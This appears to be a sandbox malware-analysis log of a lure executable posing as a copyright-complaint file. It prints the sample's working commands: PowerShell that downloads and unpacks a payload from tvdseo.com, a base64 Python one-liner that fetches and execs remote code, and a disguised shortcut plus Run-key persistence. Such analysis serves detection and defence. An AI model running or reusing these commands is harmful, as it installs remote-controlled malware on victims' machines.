Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding 6F335A5B578F89D8D14024E003ED43AB
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Downloads\Compilation of copyright-protected videos and images\photo\Compilation of copyright-protected videos and images.bat"
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Downloads\Compilation of copyright-protected videos and images\photo\Compilation of copyright-protected videos and images.cmd"
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Downloads\Compilation of copyright-protected videos and images\photo\Compilation of copyright-protected videos and images.pdf"
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im Compilation of copyright-protected videos and images.exe
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'qkxB9Wn8nG'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'qkxB9Wn8nG.zip'), $dst) "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9BZG9uaXMvQWRvbmlzJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindxwsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPeth = "$env:LOCALAPPDATA\qkxB9Wn8nG\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo New-Itemmroperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start "" "C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9BZG9uaXMvQWRvbmlzJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe "C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9BZG9uaXMvQWRvbmlzJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.Path]::GetTempPath() + 'qkxB9Wn8nG.zip') "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'qkxB9Wn8nG'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'qkxB9Wn8nG.zip'), $dst) "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9BZG9uaXMvQWRvbmlzJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindxwsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPeth = "$env:LOCALAPPDATA\qkxB9Wn8nG\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo New-Itemmroperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start "" "C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9BZG9uaXMvQWRvbmlzJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"

Tries to load missing DLLs

Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: wininet.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: version.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: msimg32.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: oledlg.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: tmp8e6b.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: wldp.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: profapi.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: propsys.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: textshaping.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: sendmail.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: netutils.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Section loaded: python310.dll
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Section loaded: python3.dll
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Section loaded: libcrypto-1_1.dll
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Section loaded: libssl-1_1.dll
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Section loaded: sqlite3.dll

Uses an in-process (OLE) Automation server

Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Tries to open an application configuration file (.cfg)

Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe

File opened: C:\Users\user\AppData\Local\qkxB9Wn8nG\pyvenv.cfg

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Persistence and Installation Behavior

Creates processes with suspicious names

Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	File created: \compilation of copyright-protected videos and images.exe
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	File created: \compilation of copyright-protected videos and images.exe
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	File created: \compilation of copyright-protected videos and images.exe
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	File created: \compilation of copyright-protected videos and images.exe
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	File created: \compilation of copyright-protected videos and images.exe
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	File created: \compilation of copyright-protected videos and images.exe
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	File created: \compilation of copyright-protected videos and images.exe
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	File created: \compilation of copyright-protected videos and images.exe
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	File created: \compilation of copyright-protected videos and images.exe
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	File created: \compilation of copyright-protected videos and images.exe

Drops PE files

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_Salsa20.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\axcontrol\axcontrol.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_keccak.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_blowfish.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\axscript\axscript.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_SHA256.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Protocol\_scrypt.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_ARC4.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pywin32_system32\pythoncom310.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\authorization\authorization.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\taskscheduler\taskscheduler.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\propsys\propsys.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\internet\internet.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_SHA512.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32\perfmondata.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_arc2.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\directsound\directsound.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\PublicKey\_x25519.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_cast.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_ofb.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_BLAKE2s.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_MD2.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\PublicKey\_ed448.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_aesni.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_des3.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Cipher\_raw_ctr.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\pywin32_system32\pywintypes310.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\Crypto\Hash\_SHA224.pyd			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site-packages\win32comext\ifilter\ifilter.pyd			Jump to dropped file
